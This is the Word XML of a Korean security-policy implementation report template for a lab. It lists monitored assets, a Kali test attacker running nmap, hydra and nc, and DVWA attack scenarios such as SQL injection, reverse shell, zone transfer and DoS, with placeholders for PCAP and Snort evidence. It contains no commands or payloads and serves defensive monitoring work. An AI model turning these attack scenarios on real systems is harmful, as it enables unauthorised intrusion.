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  <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
          <w:sz w:val="56"/>
        </w:rPr>
        <w:t>보안정책 구현</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>(결과보고서)</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>작성일: 2026-01-06  |  버전: v1.0</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>작성자/팀: (기입)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
          <w:b/>
        </w:rPr>
        <w:t>표 0-1. 문서 정보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819"/>
        <w:gridCol w:w="4819"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1984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항목</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7654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내용</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1984" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>문서명</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7654" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>보안정책 구현 결과보고서</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1984" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>문서번호</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7654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</w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1984" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>대상</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7654" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>(프로젝트/시스템명 기입)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1984" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>작성일</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7654" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>2026-01-06</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1984" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>작성자</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7654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</w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1984" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>검토/승인</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7654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</w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
          <w:b/>
        </w:rPr>
        <w:t>표 0-2. 개정 이력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w="1020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버전</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701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일자</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701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작성자</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5216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변경 내용</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1020" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>v1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>2026-01-06</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701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  <w:tc>
          <w:tcPr>
            <w:tcW w:w="5216" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>초안 작성</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
          <w:b/>
        </w:rPr>
        <w:t>표 0-3. 참고 문서(근거)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789"/>
        <w:gridCol w:w="3801"/>
        <w:gridCol w:w="5049"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="789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번호</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3801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문서명</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5049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활용 목적</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="789" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>R1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3801" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>2차 프로젝트 기획안 v0.4.1(퍼플).pdf</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5049" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>프로젝트 범위/구성 및 관제·점검 목표 정의 확인</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="789" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>R2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3801" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>기획안 주정통 코드 부분.pdf</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5049" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>주정통 기반 자동화(스크립트/함수) 구성 정의 확인</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="789" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>R3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3801" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>네트워크 보안관제 보고서.pdf</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5049" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>시나리오별 Wireshark 필터 및 정상/비정상 식별 기준 정리</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="789" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>R4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3801" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>서버 보안 정책 문서(미완성).pdf</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5049" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>공격 시나리오별 로그 패턴 및 UFW/iptables/sshd_config 대응 가이드 기반 정리</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
        </w:rPr>
        <w:t>목차</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
        </w:rPr>
        <w:t>※ Word에서 '필드 업데이트'를 실행하면 자동 목차가 생성/갱신됩니다.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText>TOC \\o "1-2" \\h \\z \\u</w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t>(Word에서 필드 업데이트 시 목차가 생성됩니다)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rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
        </w:rPr>
        <w:t>5. 보안정책 구현</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
        </w:rPr>
        <w:t>본 장은 네트워크/서버 관제 수행 결과를 기반으로 보안 정책을 구현하고, 시나리오 기반 공격 검증 과정에서 확인된 비정상 징후(패킷/로그)와 대응 방안을 결과 중심으로 정리한다. PCAP, Wireshark 캡처, Snort 경보, 터미널 출력, 로그 캡처 등 증빙자료는 후속 삽입을 전제로 자리표시자만 포함한다.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
          <w:b/>
        </w:rPr>
        <w:t>표 5-1. 수행 개요(요약)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819"/>
        <w:gridCol w:w="4819"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1984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구분</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7654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내용</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1984" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>수행 목적</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7654" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>시나리오 기반 공격 징후 식별 및 보안정책(탐지/차단/운영절차) 구현 결과 정리</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1984" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>수행 범위</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7654" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>네트워크 패킷 분석(Wireshark), 서버 로그 분석(auth/syslog/apache/kern), 차단 정책(UFW/iptables)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1984" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>관제 산출물</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7654" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>정상/비정상 판별 기준, 공격 시나리오별 로그 패턴, 차단/대응 Runbook, 정책 구현 매트릭스</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1984" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>증빙 삽입 원칙</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7654" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>각 표/그림의 증빙 ID에 맞춰 PCAP·이미지·로그를 삽입(파일명·시간·대상 자산 표기)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
          <w:b/>
        </w:rPr>
        <w:t>표 5-2. 관제/점검 대상 자산(요약, 필요 시 수정)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구분</w:t>
            </w:r>
          </w:p>
        </w:tc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자산/역할</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1814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IP/대역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OS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주요 서비스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비고</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr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</w:rPr>
              <w:t>서버</w:t>
            </w:r>
          </w:p>
        </w:tc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SSH 대상 서버</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1814" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>10.4.0.3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Ubuntu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맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>OpenSSH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시나리오(SSH 스캔/브루트포스) 기준</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr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</w:rPr>
              <w:t>서버</w:t>
            </w:r>
          </w:p>
        </w:tc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공격자(테스트) 서버</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1814" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>10.4.0.4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Kali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맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>nmap/hydra/nc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내부 테스트 목적</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr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</w:rPr>
              <w:t>서버</w:t>
            </w:r>
          </w:p>
        </w:tc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DNS/DVWA(웹) 서버</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1814" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>172.16.18.28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맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>BIND, Apache(DVWA)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시나리오(AXFR/WhatWeb/SQLi/Reverse/DoS) 기준</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr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</w:rPr>
              <w:t>서버</w:t>
            </w:r>
          </w:p>
        </w:tc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Core 서버(예시)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1814" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>172.16.16.1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Ubuntu/Rocky9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맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>DHCP/Apache/DB 등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자동화 스크립트 입력 예시 기준</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr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</w:rPr>
              <w:t>네트워크</w:t>
            </w:r>
          </w:p>
        </w:tc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내부망(예시)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1814" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>172.16.0.0/16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-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맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>-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웹 접근 허용 대역 예시</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr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</w:rPr>
              <w:t>-</w:t>
            </w:r>
          </w:p>
        </w:tc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(추가 기입)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1814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</w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
          <w:b/>
        </w:rPr>
        <w:t>표 5-3. 증빙자료 ID 체계(삽입 예정)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w="1361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구분</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1361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ID 예시</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551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증빙 형태</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4365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비고</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1361" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>패킷</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1361" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>PCAP-5-01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>pcap/pcapng</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4365" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>Wireshark 재현 가능하도록 기간/필터 기입</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1361" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>Wireshark</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1361" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>WS-5-01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>캡처 이미지</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4365" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>필터/표시 필드가 보이도록 캡처</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1361" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>Snort</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1361" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>SN-5-01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
